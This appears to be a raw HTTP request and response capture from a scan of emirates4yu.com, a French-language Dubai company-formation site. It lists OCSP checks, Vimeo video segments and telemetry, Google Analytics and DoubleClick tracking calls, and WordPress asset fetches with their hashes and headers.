910460925ed4f86f978933432494558f5138858024546331ece9c492c3dd49a0
POST /s/gts1d4/QNGijQL5IyE HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:02 GMT
Cache-Control: public, max-age=14400
Server: scaffolding on HTTPServer2
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/audio/3922791d/chop/segment-1.m4s?r=dXM%3D
23.36.76.194 200 OK 105 kB URL HTTP/1.1 156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/audio/3922791d/chop/segment-1.m4s?r=dXM%3D
IP 23.36.76.194:0
ASN #20940 Akamai International B.V.
Size 105 kB (105161 bytes)
Hash 5b269110301e18c943c6103b2808ca76
734f31e85ad62f26ab3a22ba1e99b39c2b237ff2
a6c6f06a8a1f38b1d4f305d424aa53969122ff0202ae47077685f5cf77c8b049
GET /exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/audio/3922791d/chop/segment-1.m4s?r=dXM%3D HTTP/1.1
Host: 156vod-adaptive.akamaized.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Length: 105161
using-starlord: true
origin-retrieved-hour: 1657832400
Access-Control-Max-Age: 86400
timing-allow-origin: *
Aka-c-hit: cache-hit
Cache-Control: max-age=31536000
Date: Fri, 25 Nov 2022 12:02:02 GMT
Connection: keep-alive
Akamai-Mon-Iucid-Del: 877678
Alt-Svc: h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
Content-Type: video/mp4
AK-REFERENCE-ID: 0.be4c2417.1669377722.324214e
X-VIM-CACHEBC: EP:H11,E:m,TD0:m,CW:h
Access-Control-Expose-Headers: Akamai-Edge-IP, X-VIM-CACHEBC, X-Akamai-Request-ID, AK-REFERENCE-ID
Akamai-Edge-IP: 23.36.76.194
Access-Control-Allow-Headers: Content-Type, Accept-Encoding, Range, X-OTT-Agent,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
Access-Control-Allow-Origin: *
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash d3d2d21ac304813a16da64921ce18ba4
98b1762c675c61eeb18254986461e6b1074ebc92
af00429c189464ddb8df704dc48035421f943444df6ca17390fb97466c2e7e9b
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:02 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
fresnel.vimeocdn.com/add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721
34.120.202.204 200 OK 0 B URL HTTP/2 fresnel.vimeocdn.com/add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721
IP 34.120.202.204:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST /add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721 HTTP/1.1
Host: fresnel.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 1423
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-credentials: true
access-control-allow-origin: https://player.vimeo.com
date: Fri, 25 Nov 2022 12:02:03 GMT
content-length: 0
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
fresnel.vimeocdn.com/add/player-test-impression?beacon=1
34.120.202.204 200 OK 0 B URL HTTP/2 fresnel.vimeocdn.com/add/player-test-impression?beacon=1
IP 34.120.202.204:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST /add/player-test-impression?beacon=1 HTTP/1.1
Host: fresnel.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 116
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-credentials: true
access-control-allow-origin: https://player.vimeo.com
date: Fri, 25 Nov 2022 12:02:03 GMT
content-length: 0
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
fresnel.vimeocdn.com/add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721
34.120.202.204 200 OK 0 B URL HTTP/2 fresnel.vimeocdn.com/add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721
IP 34.120.202.204:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST /add/player-stats?beacon=1&session-id=c98e53c98c80d233cfcd6a42aef33723cc2fb6321669377721 HTTP/1.1
Host: fresnel.vimeocdn.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 1715
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-credentials: true
access-control-allow-origin: https://player.vimeo.com
date: Fri, 25 Nov 2022 12:02:03 GMT
content-length: 0
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
player-telemetry.vimeo.com/player-events/log/play
34.120.202.204 200 OK 0 B URL HTTP/2 player-telemetry.vimeo.com/player-events/log/play
IP 34.120.202.204:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST /player-events/log/play HTTP/1.1
Host: player-telemetry.vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 650
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
HTTP/2 200 OK
access-control-allow-credentials: true
access-control-allow-origin: https://player.vimeo.com
content-type: text/html; charset=UTF-8
date: Fri, 25 Nov 2022 12:02:03 GMT
content-length: 0
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 163d4912a06d8358abc770dc0351d7b4
1e8dc04b95e704679ab729f81716466ea8a3e591
72245d178d481350af611804e557032ffb7bb3a3e8cdb83f3332a5ffba78d193
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:03 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j98&tid=UA-72772477-1&cid=1802790675.1669377722&jid=1581618082&gjid=832908569&_gid=116220358.1669377722&_u=YADAAAAAAAAAAC~&z=585780717
142.251.1.155 200 OK 4 B URL HTTP/2 stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j98&tid=UA-72772477-1&cid=1802790675.1669377722&jid=1581618082&gjid=832908569&_gid=116220358.1669377722&_u=YADAAAAAAAAAAC~&z=585780717
IP 142.251.1.155:0
File type ASCII text, with no line terminators
Hash 48c0473b7821185d937e685216e2168b
3743e47f8a429a5e87b86cb582d78940733d9d2e
570c4d4674fd20602189c548c145ba1f8ac34bc2e4599a71471969028aa1e25a
POST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j98&tid=UA-72772477-1&cid=1802790675.1669377722&jid=1581618082&gjid=832908569&_gid=116220358.1669377722&_u=YADAAAAAAAAAAC~&z=585780717 HTTP/1.1
Host: stats.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
Content-Length: 0
Origin: https://emirates4yu.com
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: https://emirates4yu.com
strict-transport-security: max-age=10886400; includeSubDomains; preload
date: Fri, 25 Nov 2022 12:02:03 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
last-modified: Sun, 17 May 1998 03:00:00 GMT
access-control-allow-credentials: true
x-content-type-options: nosniff
content-type: text/plain
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 4
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
142.250.74.3 200 OK 471 B URL HTTP/1.1 ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
IP 142.250.74.3:0
Hash 61517fa91f17a258efc6790dec509bef
e20b96cea0c630268639d9159171d8e935b9466e
910460925ed4f86f978933432494558f5138858024546331ece9c492c3dd49a0
POST /s/gts1d4/QNGijQL5IyE HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:03 GMT
Cache-Control: public, max-age=14400
Server: scaffolding on HTTPServer2
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.google.no/pagead/1p-user-list/942127788/?random=1669377722080&cv=11&fst=1669377600000&bg=ffffff&guid=ON&async=1&gtm=2wgb90&u_w=1280&u_h=1024&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&fmt=3&is_vtc=1&random=537023477&rmt_tld=1&ipr=y
142.250.74.3 200 OK 42 B URL HTTP/2 www.google.no/pagead/1p-user-list/942127788/?random=1669377722080&cv=11&fst=1669377600000&bg=ffffff&guid=ON&async=1&gtm=2wgb90&u_w=1280&u_h=1024&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&fmt=3&is_vtc=1&random=537023477&rmt_tld=1&ipr=y
IP 142.250.74.3:0
File type GIF image data, version 89a, 1 x 1
Hash d89746888da2d9510b64a9f031eaecd5
d5fceb6532643d0d84ffe09c40c481ecdf59e15a
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
GET /pagead/1p-user-list/942127788/?random=1669377722080&cv=11&fst=1669377600000&bg=ffffff&guid=ON&async=1&gtm=2wgb90&u_w=1280&u_h=1024&frm=0&url=https%3A%2F%2Femirates4yu.com%2Ffr%2F&tiba=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&fmt=3&is_vtc=1&random=537023477&rmt_tld=1&ipr=y HTTP/1.1
Host: www.google.no
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Fri, 25 Nov 2022 12:02:03 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
content-type: image/gif
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
content-length: 42
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
142.250.74.3 200 OK 471 B URL HTTP/1.1 ocsp.pki.goog/s/gts1d4/QNGijQL5IyE
IP 142.250.74.3:0
Hash 61517fa91f17a258efc6790dec509bef
e20b96cea0c630268639d9159171d8e935b9466e
910460925ed4f86f978933432494558f5138858024546331ece9c492c3dd49a0
POST /s/gts1d4/QNGijQL5IyE HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:03 GMT
Cache-Control: public, max-age=14400
Server: scaffolding on HTTPServer2
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/d7f2cc29/chop/segment-1.m4s?r=dXM%3D
23.36.76.194 200 OK 204 kB URL HTTP/1.1 156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/d7f2cc29/chop/segment-1.m4s?r=dXM%3D
IP 23.36.76.194:0
ASN #20940 Akamai International B.V.
Size 204 kB (204224 bytes)
Hash 657fe7363a85b854664d3cc520e5759d
5b31e0b006285c9a6ff63fe9f853d607b1cdcf19
d1aa50adb037cb35189f03f0351a2c61b3551bbe40c45ae4e275ac7df861820e
GET /exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/d7f2cc29/chop/segment-1.m4s?r=dXM%3D HTTP/1.1
Host: 156vod-adaptive.akamaized.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Length: 204224
using-starlord: true
origin-retrieved-hour: 1657832400
Access-Control-Max-Age: 86400
timing-allow-origin: *
Aka-c-hit: cache-hit
Cache-Control: max-age=31536000
Date: Fri, 25 Nov 2022 12:02:03 GMT
Connection: keep-alive
Akamai-Mon-Iucid-Del: 877678
Alt-Svc: h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
Content-Type: video/mp4
AK-REFERENCE-ID: 0.be4c2417.1669377723.324215c
X-VIM-CACHEBC: EP:H11,E:m,TD0:m,CW:h
Access-Control-Expose-Headers: Akamai-Edge-IP, X-VIM-CACHEBC, X-Akamai-Request-ID, AK-REFERENCE-ID
Akamai-Edge-IP: 23.36.76.194
Access-Control-Allow-Headers: Content-Type, Accept-Encoding, Range, X-OTT-Agent,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
Access-Control-Allow-Origin: *
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 163d4912a06d8358abc770dc0351d7b4
1e8dc04b95e704679ab729f81716466ea8a3e591
72245d178d481350af611804e557032ffb7bb3a3e8cdb83f3332a5ffba78d193
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:03 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d/chop/segment-1.m4s?r=dXM%3D
23.36.76.194 200 OK 344 kB URL HTTP/1.1 156vod-adaptive.akamaized.net/exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d/chop/segment-1.m4s?r=dXM%3D
IP 23.36.76.194:0
ASN #20940 Akamai International B.V.
Size 344 kB (343902 bytes)
Hash b96cc4e63b47363f1d8fa153d67a5126
24e9c8f4059d647c3a29eb948e699163ffff3917
8c8f4f02b0623d93977120ed8fd8b4553196d98d09b129e678028942e3d92188
GET /exp=1669381621~acl=%2Ff7711139-0188-45a1-a390-cbc4d6fb4063%2F%2A~hmac=5b76108d4c4cd6912ca21ec155a4146ca201ba437d19c295f78181ead24e39ca/f7711139-0188-45a1-a390-cbc4d6fb4063/sep/video/3922791d/chop/segment-1.m4s?r=dXM%3D HTTP/1.1
Host: 156vod-adaptive.akamaized.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Length: 343902
using-starlord: true
origin-retrieved-hour: 1657962000
Access-Control-Max-Age: 86400
timing-allow-origin: *
Aka-c-hit: cache-hit
Cache-Control: max-age=31535958
Date: Fri, 25 Nov 2022 12:02:03 GMT
Connection: keep-alive
Akamai-Mon-Iucid-Del: 877678
Alt-Svc: h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
Content-Type: video/mp4
AK-REFERENCE-ID: 0.be4c2417.1669377723.324216d
X-VIM-CACHEBC: EP:H11,E:m,TD0:m,CW:h
Access-Control-Expose-Headers: Akamai-Edge-IP, X-VIM-CACHEBC, X-Akamai-Request-ID, AK-REFERENCE-ID
Akamai-Edge-IP: 23.36.76.194
Access-Control-Allow-Headers: Content-Type, Accept-Encoding, Range, X-OTT-Agent,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
Access-Control-Allow-Origin: *
region1.google-analytics.com/g/collect?v=2&tid=G-ZH335RKFLP&gtm=2oeb90&_p=863136926&cid=1802790675.1669377722&ul=en-us&sr=1280x1024&_s=1&sid=1669377722&sct=1&seg=0&dl=https%3A%2F%2Femirates4yu.com%2Ffr%2F&dt=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&en=page_view&_fv=1&_nsi=1&_ss=1
216.239.32.36 204 No Content 0 B URL HTTP/2 region1.google-analytics.com/g/collect?v=2&tid=G-ZH335RKFLP&gtm=2oeb90&_p=863136926&cid=1802790675.1669377722&ul=en-us&sr=1280x1024&_s=1&sid=1669377722&sct=1&seg=0&dl=https%3A%2F%2Femirates4yu.com%2Ffr%2F&dt=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&en=page_view&_fv=1&_nsi=1&_ss=1
IP 216.239.32.36:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST /g/collect?v=2&tid=G-ZH335RKFLP&gtm=2oeb90&_p=863136926&cid=1802790675.1669377722&ul=en-us&sr=1280x1024&_s=1&sid=1669377722&sct=1&seg=0&dl=https%3A%2F%2Femirates4yu.com%2Ffr%2F&dt=Cr%C3%A9ation%20d%E2%80%99entreprise%20%C3%A0%20Duba%C3%AF%20%7C%20Emirates%204%20You&en=page_view&_fv=1&_nsi=1&_ss=1 HTTP/1.1
Host: region1.google-analytics.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://emirates4yu.com
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Content-Length: 0
HTTP/2 204 No Content
access-control-allow-origin: https://emirates4yu.com
date: Fri, 25 Nov 2022 12:02:03 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
access-control-allow-credentials: true
content-type: text/plain
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
bam.nr-data.net/events/1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=2111&ck=1&ref=https://player.vimeo.com/video/307072005
162.247.241.14 200 OK 24 B URL HTTP/1.1 bam.nr-data.net/events/1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=2111&ck=1&ref=https://player.vimeo.com/video/307072005
IP 162.247.241.14:0
File type GIF image data, version 89a, 1 x 1
Hash bc32ed98d624acb4008f986349a20d26
2d3df8c11d2168ce2c27e0937421d11d85016361
0c9cf152a0ad00d4f102c93c613c104914be5517ac8f8e0831727f8bfbe8b300
POST /events/1/689d5b4562?a=2815207&v=1216.487a282&to=NVVXNhYAWhJWBhVfCwwfcxcKAkAIWAtOQA0PVVpMBw5aFUUKDVoBEEMbDwUIWj5UCg9CFg1cWQcWW3kAXgspVwoGXFAQSgZRFQ%3D%3D&rst=2111&ck=1&ref=https://player.vimeo.com/video/307072005 HTTP/1.1
Host: bam.nr-data.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
content-type: text/plain
Content-Length: 1672
Origin: https://player.vimeo.com
Connection: keep-alive
Referer: https://player.vimeo.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Date: Fri, 25 Nov 2022 12:02:03 GMT
Content-Type: image/gif
Content-Length: 24
Connection: keep-alive
CF-Ray: 76fa3bb39ba80af6-OSL
Access-Control-Allow-Origin: https://player.vimeo.com
CF-Cache-Status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
Vary: Accept-Encoding
Server: cloudflare
emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-column.css?ver=6.1.5
35.190.203.220 200 OK 0 B URL HTTP/2 emirates4yu.com/wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-column.css?ver=6.1.5
IP 35.190.203.220:0
GET /wp-content/themes/jupiter/header-builder/includes/assets/css/mkhb-column.css?ver=6.1.5 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: text/css
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sun, 23 Dec 2018 22:54:03 GMT
etag: W/"5c20120b-11cf"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/click-to-chat-for-whatsapp/assets/js/app.js?ver=1.6
